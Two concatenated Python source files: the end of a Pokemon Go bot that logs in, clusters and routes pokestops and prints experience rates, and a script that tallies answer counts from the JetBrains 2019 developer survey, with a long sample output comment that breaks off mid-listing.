        with open(config_file) as data:
            load.update(json.load(data))

    # An option is required on the command line only when the JSON file
    # did not already supply it.
    required = lambda x: x not in load
    parser.add_argument("-a", "--auth_service", help="Auth Service ('ptc' or 'google')",
        required=required("auth_service"))
    parser.add_argument("-u", "--username", help="Username", required=required("username"))
    parser.add_argument("-p", "--password", help="Password")
    parser.add_argument("-l", "--location", help="Location", required=required("location"))
    parser.add_argument("-d", "--debug", help="Debug Mode", action='store_true')
    parser.add_argument("-t", "--test", help="Only parse the specified location", action='store_true')
    parser.set_defaults(DEBUG=False, TEST=False)
    config = parser.parse_args()

    # Passed in arguments should trump values from the JSON file.
    for key in config.__dict__:
        if key in load and config.__dict__[key] is None:
            config.__dict__[key] = load[key]

    # Get password from stdin if it was provided neither on the CLI nor in
    # the JSON file. (Fixes the previously garbled 'get<PASSWORD>pass'
    # call, which was a syntax error.)
    if config.__dict__['password'] is None:
        config.__dict__['password'] = getpass.getpass('Password:')

    if config.auth_service not in ['ptc', 'google']:
        log.error("Invalid Auth service specified! ('ptc' or 'google')")
        return None

    return config
def show_map(pokestops, wild_pokemons):
    """Open a Google static map in the default browser.

    The pokestop route is drawn as a thin red path; the first pokestop and
    every wild pokemon get individual markers.
    """
    url_string = 'http://maps.googleapis.com/maps/api/staticmap?size=2048x2048&path=color:red|weight:1|'
    for pokestop in pokestops: # client.get_pokestop():
        url_string += '{},{}|'.format(pokestop['latitude'], pokestop['longitude'])
    # Drop the trailing '|' separator.
    url_string=url_string[:-1]
    if len(pokestops):
        url_string += '&markers={},{}'.format(pokestops[0]['latitude'], pokestops[0]['longitude'])
    if len(wild_pokemons):
        for wild_pokemon in wild_pokemons:
            url_string += '&markers={},{}'.format(wild_pokemon['latitude'], wild_pokemon['longitude'])
    print(url_string)
    webbrowser.open(url_string)
def main():
    """Bot entry point: log in, then loop visiting clustered pokestops.

    Each outer iteration creates a fresh Client, clusters the nearby
    pokestops, orders them with the TSP solver, and walks the route while
    printing running experience statistics. Login/session failures restart
    the loop; Ctrl-C or SystemExit ends it.
    """
    # logging.getLogger("requests").setLevel(logging.DEBUG)
    # logging.getLogger("pgoapi").setLevel(logging.DEBUG)
    # logging.getLogger("rpc_api").setLevel(logging.DEBUG)

    config = init_config()
    if not config:
        return

    if config.debug:
        consoleHandler.setLevel(logging.DEBUG)
        rootLogger.addHandler(consoleHandler)

    # provide player position on the earth
    position = get_pos_by_name(config.location)
    if config.test:
        return

    ################################################ Actual
    # Reuse a cached auth token from a previous run when available.
    auth_token = None
    try:
        with open("token.txt", "r") as f:
            auth_token = f.read().strip()
    except:
        pass
    #######################################################

    start_time = time.time()
    start_exp = 0
    start_pokemon = 0
    start_pokestop = 0

    evolve = False
    evolve_list = [ ]

    map_showed = False

    while True:
        client = Client()
        client.jump_to(*position)
        try:
            if not client.login(str(config.auth_service), str(config.username), str(config.password), auth_token=auth_token):
                print 'Login failed, retry after 30s'
                time.sleep(30)
                continue

            client.scan().summary().summary_pokemon()
            # client.use_item_xp_boost()
            # client.scan().bulk_release_pokemon()
            # client.scan().bulk_evolve_pokemon(dry=False)
            # client.scan().bulk_evolve_pokemon(dry=False)
            # exit(1)

            # Capture baseline stats on the first successful login only.
            if start_exp == 0:
                start_exp = client.profile['experience']
                start_pokemon = client.profile['pokemons_captured']
                start_pokestop = client.profile['poke_stop_visits']

            # if evolve:
            #     client.bulk_evolve_pokemon(dry=False)
            #     for pokemon_id in evolve_list:
            #         client.manual_evolve_pokemon(pokemon_id, dry=False)

            # Keep only the densest cluster of stops, then order them.
            clustered_pokestops = Cluster(client.get_pokestop()).solve()
            sorted_pokestops = TSP(clustered_pokestops).solve()

            if not map_showed:
                show_map(sorted_pokestops, [])
                map_showed = True

            for pokestop in sorted_pokestops:
                client.move_to_pokestop_catch(pokestop).status()
                time_delta = time.time() - start_time
                exp_delta = client.profile['experience'] - start_exp
                print 'SEC = %d, POKEMON = %d, POKESTOP = %d, EFFICIENCY = %.2f Exp/Hour' % (
                    time_delta,
                    client.profile['pokemons_captured'] - start_pokemon,
                    client.profile['poke_stop_visits'] - start_pokestop,
                    float(exp_delta) / time_delta * 3600)

        except NotLoggedInException:
            # Cached token expired: fall back to password login next pass.
            if auth_token is not None:
                print 'Token login failed, use password'
                auth_token = None
            print 'NotLoggedInException, continue'
            continue
        except KeyboardInterrupt:
            break
        except SystemExit:
            break
        except:
            exc_info = sys.exc_info()
            traceback.print_exception(*exc_info)
            # exit(1)
            continue

        print 'Loop finished, sleep for 10s'
        time.sleep(10)
if __name__ == '__main__':
    # Run the bot loop when invoked as a script.
    main()
| StarcoderdataPython |
1624857 | import json
from pyjetbrainsdevecosystem.data_import_utils import unpack_csv_data
# Tally answers from the JetBrains DevEcosystem 2019 survey data drop.
#
# Step 1: read the questions CSV to learn every question "shortname".
# Step 2: scan the survey export's header to find which columns belong to
#         each question (header cells are prefixed with the shortname).
# Step 3: count how often each answer value occurs per question, and dump
#         the tally to stdout as JSON (see the sample output comment below).

questions_dict = {}
with open('survey_data/2019/DevEcosystem 2019 questions_outside.csv',
          encoding='utf8') as questions_text:
    questions_reader = unpack_csv_data(questions_text)
    questions_fieldnames = questions_reader.fieldnames  # kept for parity with survey pass; unused below
    for column in questions_reader:
        # BUG FIX: the original stored a *set literal* of the four metadata
        # values, which discarded the field names and silently collapsed any
        # duplicate values.  Store a field-name -> value mapping instead.
        # Only the keys of questions_dict are consumed below, so the rest of
        # the script behaves identically.
        questions_dict[column['shortname']] = {
            'question_title': column['question_title'],
            'type': column['type'],
            'page': column['page'],
            'place': column['place'],
        }

question_column_map = {}
entry_count = {}
with open('survey_data/2019/sharing_data_outside2019.csv',
          newline='',
          encoding='utf8') as survey_text:
    survey_reader = unpack_csv_data(survey_text)
    survey_fieldnames = survey_reader.fieldnames

    # Map each question shortname to {header cell: column position} for every
    # header cell that starts with the shortname.  NOTE(review): plain prefix
    # matching means e.g. 'proglang' also captures the 'proglang_rank.*'
    # columns (visible in the sample output below); preserved as-is.
    for question in questions_dict:
        matching_columns = {}
        # enumerate() yields the true position directly; the original called
        # survey_fieldnames.index() per match, an accidental O(n^2) rescan.
        for column_number, field_name in enumerate(survey_fieldnames):
            if field_name.startswith(question):
                matching_columns[field_name] = column_number
        question_column_map[question] = matching_columns

    # Count answer-value frequencies per question across all responses.
    # (The original also assembled a per-response dict that was discarded
    # every iteration; that dead work has been removed.)
    for response in survey_reader:
        for parent_question, column_name_dict in question_column_map.items():
            sub_entry_count = entry_count.setdefault(parent_question, {})
            for column_name in column_name_dict:
                value = response[column_name]
                sub_entry_count[value] = sub_entry_count.get(value, 0) + 1

print(json.dumps(entry_count, indent=4))
#print(json.dumps(question_column_map, indent=4))
# {
# "os_devenv": {
# "os_devenv.Windows": 19,
# "os_devenv.Unix / Linux": 20,
# "os_devenv.macOS": 21,
# "os_devenv.Other": 22
# },
# "app_type_money": {
# "app_type_money.I don't develop anything for money": 23,
# "app_type_money.Web Back-end": 24,
# "app_type_money.Web Front-end": 25,
# "app_type_money.Mobile applications": 26,
# "app_type_money.Desktop": 27,
# "app_type_money.Data analysis": 28,
# "app_type_money.BI": 29,
# "app_type_money.Machine learning": 30,
# "app_type_money.Libraries / Frameworks": 31,
# "app_type_money.Embedded / IoT": 32,
# "app_type_money.Games": 33,
# "app_type_money.Other Back-end": 34,
# "app_type_money.Other": 35
# },
# "dev_for_mobile_os": {
# "dev_for_mobile_os.Android": 76,
# "dev_for_mobile_os.iOS": 77,
# "dev_for_mobile_os.Other": 78
# },
# "db_adopt": {
# "db_adopt.No, not planning to adopt / migrate": 270,
# "db_adopt.Yes, planning to adopt / migrate to other database(s) - Write in": 271,
# "db_adopt.DB2": 272,
# "db_adopt.MS SQL Server": 273,
# "db_adopt.MySQL": 274,
# "db_adopt.Oracle Database": 275,
# "db_adopt.PostgreSQL": 276,
# "db_adopt.SQLite": 277,
# "db_adopt.Cassandra": 278,
# "db_adopt.Couchbase": 279,
# "db_adopt.HBase": 280,
# "db_adopt.MongoDB": 281,
# "db_adopt.Neo4j": 282,
# "db_adopt.Redis": 283,
# "db_adopt.Amazon Redshift": 284,
# "db_adopt.H2": 285,
# "db_adopt.MariaDB": 286,
# "db_adopt.ClickHouse": 287,
# "db_adopt.Other": 288
# },
# "proglang": {
# "proglang.I don't use programming languages": 97,
# "proglang.Java": 98,
# "proglang.C": 99,
# "proglang.C++": 100,
# "proglang.Python": 101,
# "proglang.C#": 102,
# "proglang.PHP": 103,
# "proglang.JavaScript": 104,
# "proglang.Ruby": 105,
# "proglang.Elixir": 106,
# "proglang.Crystal": 107,
# "proglang.Kotlin": 108,
# "proglang.Swift": 109,
# "proglang.Objective-C": 110,
# "proglang.Visual Basic": 111,
# "proglang.Scala": 112,
# "proglang.Go": 113,
# "proglang.HTML / CSS": 114,
# "proglang.Haskell": 115,
# "proglang.R": 116,
# "proglang.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 117,
# "proglang.TypeScript": 118,
# "proglang.Dart": 119,
# "proglang.CoffeeScript": 120,
# "proglang.Clojure / ClojureScript": 121,
# "proglang.Delphi": 122,
# "proglang.Cobol": 123,
# "proglang.Groovy": 124,
# "proglang.Rust": 125,
# "proglang.Perl": 126,
# "proglang.Assembly": 127,
# "proglang.Matlab": 128,
# "proglang.Lua": 129,
# "proglang.Shell scripting languages(bash/shell/powershell)": 130,
# "proglang.Julia": 131,
# "proglang.F#": 132,
# "proglang.Other": 133,
# "proglang_rank.Java": 208,
# "proglang_rank.C": 209,
# "proglang_rank.C++": 210,
# "proglang_rank.Python": 211,
# "proglang_rank.C#": 212,
# "proglang_rank.PHP": 213,
# "proglang_rank.JavaScript": 214,
# "proglang_rank.Ruby": 215,
# "proglang_rank.Kotlin": 216,
# "proglang_rank.Swift": 217,
# "proglang_rank.Objective-C": 218,
# "proglang_rank.Scala": 219,
# "proglang_rank.Go": 220,
# "proglang_rank.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 221,
# "proglang_rank.Rust": 222,
# "proglang_rank.Haskell": 223,
# "proglang_rank.HTML / CSS": 224,
# "proglang_rank.Elixir": 225,
# "proglang_rank.Crystal": 226,
# "proglang_rank.Visual Basic": 227,
# "proglang_rank.R": 228,
# "proglang_rank.TypeScript": 229,
# "proglang_rank.Dart": 230,
# "proglang_rank.CoffeeScript": 231,
# "proglang_rank.Clojure / ClojureScript": 232,
# "proglang_rank.Delphi": 233,
# "proglang_rank.Cobol": 234,
# "proglang_rank.Groovy": 235,
# "proglang_rank.Perl": 236,
# "proglang_rank.Assembly": 237,
# "proglang_rank.Matlab": 238,
# "proglang_rank.Lua": 239,
# "proglang_rank.Shell scripting languages(bash/shell/powershell)": 240,
# "proglang_rank.Julia": 241,
# "proglang_rank.F#": 242,
# "proglang_rank.Other": 243
# },
# "tools_ci": {
# "tools_ci.Jenkins / Hudson": 463,
# "tools_ci.TeamCity": 464,
# "tools_ci.Bamboo": 465,
# "tools_ci.Microsoft Team Foundation Build": 466,
# "tools_ci.Travis CI": 467,
# "tools_ci.Codeship": 468,
# "tools_ci.CircleCI": 469,
# "tools_ci.CruiseControl": 470,
# "tools_ci.GoCD": 471,
# "tools_ci.Gitlab CI": 472,
# "tools_ci.Microsoft TFS / Visual Studio Team Services": 473,
# "tools_ci.AppVeyor": 474,
# "tools_ci.Drone": 475,
# "tools_ci.Semaphore CI": 476,
# "tools_ci.Other": 477
# },
# "tools_it": {
# "tools_it.Jira": 478,
# "tools_it.YouTrack": 479,
# "tools_it.Redmine": 480,
# "tools_it.GitLab Issue Board": 481,
# "tools_it.Asana": 482,
# "tools_it.Microsoft TFS / Visual Studio Team Services": 483,
# "tools_it.Trello": 484,
# "tools_it.GitHub Issues": 485,
# "tools_it.Other": 486
# },
# "tools_vcs": {
# "tools_vcs.None": 492,
# "tools_vcs.Concurrent Versions System (CVS)": 493,
# "tools_vcs.Apache Subversion (SVN)": 494,
# "tools_vcs.Git": 495,
# "tools_vcs.Mercurial": 496,
# "tools_vcs.Perforce": 497,
# "tools_vcs.Visual Studio Team Services (VSTS)": 498,
# "tools_vcs.Microsoft TFS": 499,
# "tools_vcs.Other": 500
# },
# "contribute_os": {
# "contribute_os.I work full time on open-source code and get paid for it": 1577,
# "contribute_os.I work full time on open-source code but do not get paid for it": 1578,
# "contribute_os.Yes, regularly (at least once a month)": 1579,
# "contribute_os.Yes, from time to time (several times a year)": 1580,
# "contribute_os.Only contributed a few times": 1581,
# "contribute_os.No, but I would like to": 1582,
# "contribute_os.No, and I would not like to": 1583
# },
# "hours_code_job": {
# "hours_code_job": 1569
# },
# "tools_adopted": {
# "tools_adopted.Source code collaboration tool (e_g_ GitHub, GitLab, Bitbucket)": 454,
# "tools_adopted.Issue tracker (e_g_ Jira, YouTrack)": 455,
# "tools_adopted.Code review tool (e_g_ Crucible, Upsource)": 456,
# "tools_adopted.Continuous Integration (CI) or Continuous Delivery (CD) tool (e_g_ Jenkins, TeamCity)": 457,
# "tools_adopted.Static analysis tool (e_g_ CodeClimate)": 458,
# "tools_adopted.Standalone IDE (e_g_ Eclipse, IntelliJ IDEA)": 459,
# "tools_adopted.None": 460,
# "tools_adopted.Lightweight Desktop Editor (e_g_ Sublime Text, Atom, VS Code, Vim)": 461,
# "tools_adopted.In-cloud Editor or IDE": 462
# },
# "unittests_how": {
# "unittests_how.I write unit tests": 249,
# "unittests_how.I use unit tests, but I don't write them": 250
# },
# "team_size": {
# "team_size": 1713
# },
# "advocate": {
# "advocate": 1712
# },
# "team_distributed": {
# "team_distributed": 1721
# },
# "java_version": {
# "java_version.Java 11": 527,
# "java_version.Java 10": 528,
# "java_version.Java 9": 529,
# "java_version.Java 8": 530,
# "java_version.Java 7": 531,
# "java_version.Java 6": 532,
# "java_version.Other": 533
# },
# "java_app_server": {
# "java_app_server.None": 534,
# "java_app_server.Apache Tomcat": 535,
# "java_app_server.Jetty": 536,
# "java_app_server.WildFly": 537,
# "java_app_server.JBoss EAP": 538,
# "java_app_server.WebLogic": 539,
# "java_app_server.WebSphere": 540,
# "java_app_server.Liberty": 541,
# "java_app_server.GlassFish": 542,
# "java_app_server.Payara": 543,
# "java_app_server.Other": 544
# },
# "java_app_frameworks": {
# "java_app_frameworks.None": 545,
# "java_app_frameworks.Netty": 546,
# "java_app_frameworks.Undertow": 547,
# "java_app_frameworks.Vert_x": 548,
# "java_app_frameworks.Spark Java": 549,
# "java_app_frameworks.Spring Boot": 550,
# "java_app_frameworks.Other": 551
# },
# "java_package": {
# "java_package.As artifacts (e_g_ WAR)": 552,
# "java_package.I use an embedded server (e_g_ JAR)": 553,
# "java_package.I'm not sure": 554
# },
# "java_web_frameworks": {
# "java_web_frameworks.None": 563,
# "java_web_frameworks.Spring MVC": 564,
# "java_web_frameworks.GWT": 565,
# "java_web_frameworks.Vaadin": 566,
# "java_web_frameworks.Play Framework": 567,
# "java_web_frameworks.Grails 2": 568,
# "java_web_frameworks.Grails 3": 569,
# "java_web_frameworks.Spring Boot": 570,
# "java_web_frameworks.JSF": 571,
# "java_web_frameworks.Struts 1": 572,
# "java_web_frameworks.Struts 2": 573,
# "java_web_frameworks.Wicket": 574,
# "java_web_frameworks.Dropwizard": 575,
# "java_web_frameworks.Other": 576
# },
# "java_buildsystem": {
# "java_buildsystem.None": 577,
# "java_buildsystem.Maven": 578,
# "java_buildsystem.sbt": 579,
# "java_buildsystem.Gradle": 580,
# "java_buildsystem.Ant": 581,
# "java_buildsystem.Bazel": 582,
# "java_buildsystem.Other": 583
# },
# "company_size": {
# "company_size.Just me": 1649,
# "company_size.2-10": 1650,
# "company_size.11-50": 1651,
# "company_size.51-500": 1652,
# "company_size.501-1,000": 1653,
# "company_size.1,001-5,000": 1654,
# "company_size.More than 5,000": 1655,
# "company_size.Not sure": 1656
# },
# "job_role": {
# "job_role.Developer / Programmer / Software Engineer": 1,
# "job_role.DevOps Engineer / Infrastructure Developer / etc_": 2,
# "job_role.DBA": 3,
# "job_role.Architect": 4,
# "job_role.Tester / QA Engineer": 5,
# "job_role.Technical support": 6,
# "job_role.Data analyst / Data engineer/ Data scientist": 7,
# "job_role.Business analyst": 8,
# "job_role.Team Lead": 9,
# "job_role.Systems analyst": 10,
# "job_role.Product Manager": 11,
# "job_role.UX / UI Designer": 12,
# "job_role.CIO / CEO / CTO": 13,
# "job_role.Marketing Manager": 14,
# "job_role.Developer Advocate": 15,
# "job_role.Instructor / Teacher / Tutor / etc_": 16,
# "job_role.Other": 17
# },
# "country": {
# "country": 1736
# },
# "age_range": {
# "age_range.17 or younger": 1729,
# "age_range.18-20": 1730,
# "age_range.21-29": 1731,
# "age_range.30-39": 1732,
# "age_range.40-49": 1733,
# "age_range.50-59": 1734,
# "age_range.60 or older": 1735
# },
# "adopt_proglang": {
# "adopt_proglang.No, not planning to adopt / migrate": 170,
# "adopt_proglang.Planning to adopt / migrate to other language(s) - Write in": 171,
# "adopt_proglang.Java": 172,
# "adopt_proglang.C": 173,
# "adopt_proglang.C++": 174,
# "adopt_proglang.Python": 175,
# "adopt_proglang.C#": 176,
# "adopt_proglang.PHP": 177,
# "adopt_proglang.JavaScript": 178,
# "adopt_proglang.Ruby": 179,
# "adopt_proglang.Elixir": 180,
# "adopt_proglang.Crystal": 181,
# "adopt_proglang.Kotlin": 182,
# "adopt_proglang.Swift": 183,
# "adopt_proglang.Objective-C": 184,
# "adopt_proglang.Visual Basic": 185,
# "adopt_proglang.Scala": 186,
# "adopt_proglang.Go": 187,
# "adopt_proglang.HTML / CSS": 188,
# "adopt_proglang.Haskell": 189,
# "adopt_proglang.R": 190,
# "adopt_proglang.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 191,
# "adopt_proglang.TypeScript": 192,
# "adopt_proglang.Dart": 193,
# "adopt_proglang.CoffeeScript": 194,
# "adopt_proglang.Clojure / ClojureScript": 195,
# "adopt_proglang.Delphi": 196,
# "adopt_proglang.Cobol": 197,
# "adopt_proglang.Groovy": 198,
# "adopt_proglang.Rust": 199,
# "adopt_proglang.Ceylon": 200,
# "adopt_proglang.Perl": 201,
# "adopt_proglang.Assembly": 202,
# "adopt_proglang.Matlab": 203,
# "adopt_proglang.Lua": 204,
# "adopt_proglang.Shell scripting languages(bash/shell/powershell)": 205,
# "adopt_proglang.Julia": 206,
# "adopt_proglang.F#": 207
# },
# "cloud_services": {
# "cloud_services.Amazon Web Services": 1548,
# "cloud_services.Microsoft Azure": 1549,
# "cloud_services.Google Cloud Platform": 1550,
# "cloud_services.Rackspace": 1551,
# "cloud_services.RedHat OpenShift": 1552,
# "cloud_services.IBM SoftLayer": 1553,
# "cloud_services.Cloud Foundry": 1554,
# "cloud_services.Heroku": 1555,
# "cloud_services.Other": 1556
# },
# "tools_cloud": {
# "tools_cloud.None": 487,
# "tools_cloud.Continuous Integration tool": 488,
# "tools_cloud.Continuous Delivery tool": 489,
# "tools_cloud.Code Review tool": 490,
# "tools_cloud.Issue Tracker": 491
# },
# "where_sources": {
# "where_sources.Version control as a service (e_g_ GitHub, Bitbucket)": 501,
# "where_sources.Manually deployed version control (e_g_ GitHub Enterprise, GitLab)": 502,
# "where_sources.Other": 503
# },
# "vc_service": {
# "vc_service.None": 504,
# "vc_service.GitHub": 505,
# "vc_service.GitLab": 506,
# "vc_service.Bitbucket": 507,
# "vc_service.Perforce": 508,
# "vc_service.Amazon CodeCommit": 509,
# "vc_service.SourceForge": 510,
# "vc_service.Custom tool": 511,
# "vc_service.Microsoft TFS / Visual Studio Team Services": 512,
# "vc_service.Other": 513
# },
# "ide_customise": {
# "ide_customise.No": 520,
# "ide_customise.Yes, I use custom color schemes": 521,
# "ide_customise.Yes, I use custom keymaps": 522,
# "ide_customise.Yes, I use plugins": 523,
# "ide_customise.Other": 524
# },
# "java_ee": {
# "java_ee.None": 584,
# "java_ee.Java EE 8": 585,
# "java_ee.Java EE 7": 586,
# "java_ee.Java EE 6": 587,
# "java_ee.Java EE 5": 588,
# "java_ee.J2SE": 589,
# "java_ee.Other": 590
# },
# "java_profiler": {
# "java_profiler.None": 591,
# "java_profiler.VisualVM": 592,
# "java_profiler.JProfiler": 593,
# "java_profiler.Java Mission Control": 594,
# "java_profiler.YourKit": 595,
# "java_profiler.NetBeans profiler": 596,
# "java_profiler.Honest profiler": 597,
# "java_profiler.async-profiler": 598,
# "java_profiler.Own custom tools": 599,
# "java_profiler.Other": 600
# },
# "java_ide": {
# "java_ide": 601
# },
# "c_standart": {
# "c_standart.C99": 602,
# "c_standart.C11": 603,
# "c_standart.Embedded C": 604,
# "c_standart.Other": 605
# },
# "c_ide": {
# "c_ide": 606
# },
# "c_unittesting": {
# "c_unittesting.None": 607,
# "c_unittesting.Catch": 608,
# "c_unittesting.Boost_Test": 609,
# "c_unittesting.Google Test": 610,
# "c_unittesting.CppUnit": 611,
# "c_unittesting.CppUTest": 612,
# "c_unittesting.CUnit": 613,
# "c_unittesting.Unity": 614,
# "c_unittesting.Other": 615
# },
# "c_projectmodels": {
# "c_projectmodels.None": 616,
# "c_projectmodels.Visual Studio project": 617,
# "c_projectmodels.Xcode project": 618,
# "c_projectmodels.Autotools": 619,
# "c_projectmodels.Makefiles": 620,
# "c_projectmodels.CMake": 621,
# "c_projectmodels.Qmake": 622,
# "c_projectmodels.Custom": 623,
# "c_projectmodels.Other": 624
# },
# "c_compilers": {
# "c_compilers.GCC": 632,
# "c_compilers.Clang": 633,
# "c_compilers.MSVC": 634,
# "c_compilers.Intel": 635,
# "c_compilers.Compiler for microcontrollers (like Keil, C51 C Compiler, IAR, etc_)": 636,
# "c_compilers.Custom": 637,
# "c_compilers.Other": 638
# },
# "cpp_standart": {
# "cpp_standart.C++98": 639,
# "cpp_standart.C++03": 640,
# "cpp_standart.C++11": 641,
# "cpp_standart.C++14": 642,
# "cpp_standart.C++17": 643,
# "cpp_standart_migrate.No, I don't plan to": 644,
# "cpp_standart_migrate.C++98": 645,
# "cpp_standart_migrate.C++11": 646,
# "cpp_standart_migrate.C++14": 647,
# "cpp_standart_migrate.\u0421++17": 648
# },
# "cpp_standart_migrate": {
# "cpp_standart_migrate.No, I don't plan to": 644,
# "cpp_standart_migrate.C++98": 645,
# "cpp_standart_migrate.C++11": 646,
# "cpp_standart_migrate.C++14": 647,
# "cpp_standart_migrate.\u0421++17": 648
# },
# "cpp_ide": {
# "cpp_ide.Visual Studio": 651,
# "cpp_ide.Visual Studio Code": 652,
# "cpp_ide.NetBeans": 653,
# "cpp_ide.Eclipse CDT": 654,
# "cpp_ide.QtCreator": 655,
# "cpp_ide.CLion": 656,
# "cpp_ide.Xcode": 657,
# "cpp_ide.Atom": 658,
# "cpp_ide.Sublime": 659,
# "cpp_ide.Vi/Vim": 660,
# "cpp_ide.Emacs": 661,
# "cpp_ide.Other": 662
# },
# "cpp_unittesting": {
# "cpp_unittesting.None": 663,
# "cpp_unittesting.Boost_Test": 664,
# "cpp_unittesting.Google Test": 665,
# "cpp_unittesting.CppUnit": 666,
# "cpp_unittesting.CppUTest": 667,
# "cpp_unittesting.Catch": 668,
# "cpp_unittesting.Other": 669
# },
# "cpp_projectmodels": {
# "cpp_projectmodels.None": 678,
# "cpp_projectmodels.Visual Studio project": 679,
# "cpp_projectmodels.Xcode project": 680,
# "cpp_projectmodels.Autotools": 681,
# "cpp_projectmodels.Makefiles": 682,
# "cpp_projectmodels.CMake": 683,
# "cpp_projectmodels.Qmake": 684,
# "cpp_projectmodels.SCons": 685,
# "cpp_projectmodels.Boost_Build": 686,
# "cpp_projectmodels.Bazel": 687,
# "cpp_projectmodels.Custom": 688,
# "cpp_projectmodels.Other": 689
# },
# "cpp_compilers": {
# "cpp_compilers.GCC": 690,
# "cpp_compilers.Clang": 691,
# "cpp_compilers.MSVC": 692,
# "cpp_compilers.Intel": 693,
# "cpp_compilers.Custom": 694,
# "cpp_compilers.Other": 695
# },
# "cpp_cli": {
# "cpp_cli.Yes": 649,
# "cpp_cli.No": 650
# },
# "cpp_project_size": {
# "cpp_project_size.Small / Medium projects with most commonly used C++ (C++11) features": 723,
# "cpp_project_size.Small / Medium projects with heavy use of templates/variadic templates and other C++11/14/17 features": 724,
# "cpp_project_size.Big / Huge projects with many lines of code, libraries, etc_ but only using the most common C++ (C++11) features": 725,
# "cpp_project_size.Big / Huge projects with many lines of code, libraries, etc_, with heavy use of templates/variadic templates, and other C++11/14/17 features": 726,
# "cpp_project_size.Other": 727
# },
# "python_vesion": {
# "python_vesion.Python 2": 728,
# "python_vesion.Python 3": 729
# },
# "python_ide": {
# "python_ide.PyCharm Professional Edition": 790,
# "python_ide.PyCharm Community Edition": 791,
# "python_ide.VS Code": 792,
# "python_ide.Sublime Text": 793,
# "python_ide.Vim": 794,
# "python_ide.IntelliJ IDEA": 795,
# "python_ide.Atom": 796,
# "python_ide.Emacs": 797,
# "python_ide.Eclipse + Pydev": 798,
# "python_ide.IPython Notebook": 799,
# "python_ide.Jupyter Notebook": 800,
# "python_ide.NotePad++": 801,
# "python_ide.Spyder": 802,
# "python_ide.IDLE": 803,
# "python_ide.Other": 804
# },
# "csharp_version": {
# "csharp_version.C# 5 (async / await, caller info attributes)": 805,
# "csharp_version.C# 6 (? and nameof operators, static imports, exception filters, Roslyn)": 806,
# "csharp_version.C# 7 (pattern matching, local functions, ref locals and returns, out variables)": 807,
# "csharp_version.An earlier version": 808,
# "csharp_version.I'm not sure": 809
# },
# "csharp_runtimes": {
# "csharp_runtimes._NET Framework": 810,
# "csharp_runtimes.Mono": 811,
# "csharp_runtimes._NET Core": 812
# },
# "csharp_frameworks": {
# "csharp_frameworks.None": 813,
# "csharp_frameworks.Sharepoint": 814,
# "csharp_frameworks.ASP_NET MVC": 815,
# "csharp_frameworks.ASP_NET Web Forms": 816,
# "csharp_frameworks.ASP_NET Core": 817,
# "csharp_frameworks.Windows Presentation Foundation (WPF)": 818,
# "csharp_frameworks.Windows Forms": 819,
# "csharp_frameworks.Windows Communication Foundation (WCF)": 820,
# "csharp_frameworks.Entity Framework": 821,
# "csharp_frameworks.Unity3d": 822,
# "csharp_frameworks.Xamarin": 823,
# "csharp_frameworks.UWP": 824,
# "csharp_frameworks.Azure": 825,
# "csharp_frameworks.Other": 826
# },
# "csharp_ide": {
# "csharp_ide": 827
# },
# "csharp_vsversion": {
# "csharp_vsversion": 850
# },
# "csharp_unittesting": {
# "csharp_unittesting.None": 852,
# "csharp_unittesting.MSTest/Visual Studio Unit Testing Framework": 853,
# "csharp_unittesting.MSTest V2": 854,
# "csharp_unittesting.NUnit": 855,
# "csharp_unittesting.xUnit": 856,
# "csharp_unittesting.Other": 857
# },
# "csharp_performance": {
# "csharp_performance.None": 858,
# "csharp_performance.PerfView": 859,
# "csharp_performance.Intel VTune Amplifier": 860,
# "csharp_performance.SciTech _NET memory profiler": 861,
# "csharp_performance.Windows Performance Toolkit": 862,
# "csharp_performance.Visual Studio's built-in performance and diagnostic tools": 863,
# "csharp_performance.dotTrace": 864,
# "csharp_performance.dotMemory": 865,
# "csharp_performance.ANTS Profiler": 866,
# "csharp_performance.Other": 867
# },
# "php_version": {
# "php_version.PHP 7_3": 873,
# "php_version.PHP 7_2": 874,
# "php_version.PHP 7_1": 875,
# "php_version.PHP 7_0": 876,
# "php_version.PHP 5_6": 877,
# "php_version.PHP 5_5": 878,
# "php_version.PHP 5_4": 879,
# "php_version.PHP 5_3": 880,
# "php_version.Other": 881
# },
# "php_devenviron": {
# "php_devenviron.Local": 882,
# "php_devenviron.Remote (SFTP, SSH, Remote desktop, etc_)": 883,
# "php_devenviron.Virtualized (Vagrant, Otto, etc_)": 884,
# "php_devenviron.Containerized (Docker, Rocket)": 885,
# "php_devenviron.Other": 886
# },
# "php_debugger": {
# "php_debugger": 887
# },
# "php_ide": {
# "php_ide.Atom": 901,
# "php_ide.Eclipse PDT": 902,
# "php_ide.NetBeans IDE": 903,
# "php_ide.Notepad++": 904,
# "php_ide.PHPEdit": 905,
# "php_ide.PhpStorm": 906,
# "php_ide.Sublime Text": 907,
# "php_ide.Vim": 908,
# "php_ide.VS Code": 909,
# "php_ide.IntelliJ IDEA Ultimate with PHP plugin": 910,
# "php_ide.Other": 911
# },
# "php_testing": {
# "php_testing.None": 912,
# "php_testing.PHPUnit": 913,
# "php_testing.Behat": 914,
# "php_testing.PHPSpec": 915,
# "php_testing.Codeception": 916,
# "php_testing.Atoum": 917,
# "php_testing.SimpleTest": 918,
# "php_testing.Other": 919
# },
# "js_frameworks": {
# "js_frameworks.None": 1231,
# "js_frameworks.AngularJS": 1232,
# "js_frameworks.Angular": 1233,
# "js_frameworks.React": 1234,
# "js_frameworks.React Native": 1235,
# "js_frameworks.Cordova / PhoneGap": 1236,
# "js_frameworks.Express": 1237,
# "js_frameworks.Vue_js": 1238,
# "js_frameworks.Meteor": 1239,
# "js_frameworks.Ember": 1240,
# "js_frameworks.Backbone": 1241,
# "js_frameworks.Polymer": 1242,
# "js_frameworks.Electron": 1243,
# "js_frameworks.Other": 1244
# },
# "js_ide": {
# "js_ide.WebStorm (or another JetBrains IDE)": 1245,
# "js_ide.Sublime Text": 1246,
# "js_ide.Atom": 1247,
# "js_ide.VS Code": 1248,
# "js_ide.Vi / Vim": 1249,
# "js_ide.Visual Studio": 1250,
# "js_ide.NotePad++": 1251,
# "js_ide.Emacs": 1252,
# "js_ide.Other": 1253
# },
# "js_unittesting": {
# "js_unittesting.None": 1254,
# "js_unittesting.Mocha": 1255,
# "js_unittesting.Jest": 1256,
# "js_unittesting.Ava": 1257,
# "js_unittesting.Karma": 1258,
# "js_unittesting.Jasmine": 1259,
# "js_unittesting.Other": 1260
# },
# "js_moduleloader": {
# "js_moduleloader.None": 1261,
# "js_moduleloader.Browserify": 1262,
